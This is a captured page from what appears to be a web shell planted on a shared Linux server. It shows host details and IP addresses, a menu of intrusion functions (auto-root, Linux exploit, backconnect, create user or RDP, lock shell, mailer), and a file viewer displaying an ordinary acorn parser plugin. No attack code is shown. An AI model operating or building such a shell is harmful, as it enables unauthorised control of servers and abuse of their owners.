Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
acorn-export-ns-from /
[ HOME SHELL ]
Name
Size
Permission
Action
index.js
913
B
-rw-r--r--
package.json
849
B
-rw-r--r--
run_test262.js
645
B
-rw-r--r--
test262.whitelist
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
"use strict" const skipWhiteSpace = /(?:\s|\/\/.*|\/\*[^]*?\*\/)*/g module.exports = function(Parser) { const tt = (Parser.acorn || require("acorn")).tokTypes return class extends Parser { parseExport(node, exports) { skipWhiteSpace.lastIndex = this.pos const skip = skipWhiteSpace.exec(this.input) const next = this.input.charAt(this.pos + skip[0].length) if (next !== "*") return super.parseExport(node, exports) this.next() this.expect(tt.star) if (this.eatContextual("as")) { node.exported = this.parseIdent(true) this.checkExport(exports, node.exported.name, node.exported.start) } else node.exported = null this.expectContextual("from") if (this.type !== tt.string) this.unexpected() node.source = this.parseExprAtom() this.semicolon() return this.finishNode(node, "ExportAllDeclaration") } } }
Close